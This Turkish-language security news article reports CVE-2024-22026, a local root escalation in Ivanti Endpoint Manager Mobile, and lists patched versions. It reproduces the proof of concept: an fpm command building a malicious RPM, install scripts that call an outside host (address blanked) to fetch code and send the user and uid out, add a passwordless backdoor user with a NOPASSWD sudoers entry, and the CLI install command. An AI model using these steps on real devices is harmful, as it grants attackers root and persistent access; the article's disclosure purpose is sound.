Eski adı MobileIron Core olan Ivanti Endpoint Manager Mobile’da (EPMM) yeni açıklanan CVE-2024-22026 güvenlik açığı bulundu.
Bu güvenlik açığı, yerel bir saldırganın etkilenen sistemlere kök erişimi sağlamasına olanak tanır.
Bu güvenlik açığının ciddiyeti şu anda belirlenmemiştir.
CVE-2024-22026: Yerel Ayrıcalık Arttırılması Güvenlik Açığı
CVE-2024-22026’nın saldırı vektörü yereldir, yani Github’un raporlarına göre saldırganın güvenlik açığından yararlanabilmesi için sisteme yerel erişime sahip olması gerekir.
Saldırgan bir kez istismar edildiğinde, sistem üzerinde tam kontrol sağlayan ve potansiyel olarak önemli güvenlik ihlallerine yol açabilecek kök erişimi elde edebilir.
Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers
Keşif
Cihaz, RPM paketlerini almak ve yüklemek için düşük ayrıcalıklı bir kullanıcı olarak aşağıdaki komutu kullanır:
install rpm url
Bu komut, aşağıdakilerin gerçekleşmesini sağlayan ve root olarak çalışan bir CLI sarmalayıcısıdır:
/bin/rpm -Uvh *.rpm
RPM komutunun kendisi imzaları kontrol etmediği veya URL’leri engellemediği için herhangi bir RPM paketini çalıştırmak mümkündür. Bir saldırgan sahte bir RPM paketi oluşturup bunu cihaza göndererek cihazı savunmasız hale getirebilir.
Sömürü PoCKötü Amaçlı RPM Oluşturma
Kötü amaçlı bir RPM paketi oluşturmak için aşağıdaki komut kullanılır:
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .
Komut Dosyasını Önyükleme (preinstall.sh)
#!/bin/sh
curl -O http:///poc
exit 0
Postinstall Script (postinstall.sh)
#!/bin/sh
set -e # Enable strict error checking
# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http:///poc?user=$CURRENT_USER
curl http:///poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
echo "Failed to add user 'exploit-poc'" >&2
exit 1
fi
echo "exploit-poc:" | chpasswd
# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
echo "Failed to modify sudoers file" >&2
exit 1
fi
exit 0
RPM’yi Getirmek için CLI Komutunu Çalıştırma: Saldırgan, bu kusurdan yararlanmak amacıyla kötü amaçlı RPM’yi almak ve yüklemek için CLI’de aşağıdaki kodu kullanır:
install rpm url http:///ivanti-privesc-13.37-1.i386.rpm
Ivanti, bu güvenlik açığını gidermek için 12.1.0.0, 12.0.0.0 ve 11.12.0.1 sürümlerinde yamalar yayınladı.
CVE-2024-22026 ile ilişkili riski azaltmak için kullanıcıların bu sürümleri güncellemeleri önemle tavsiye edilir.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free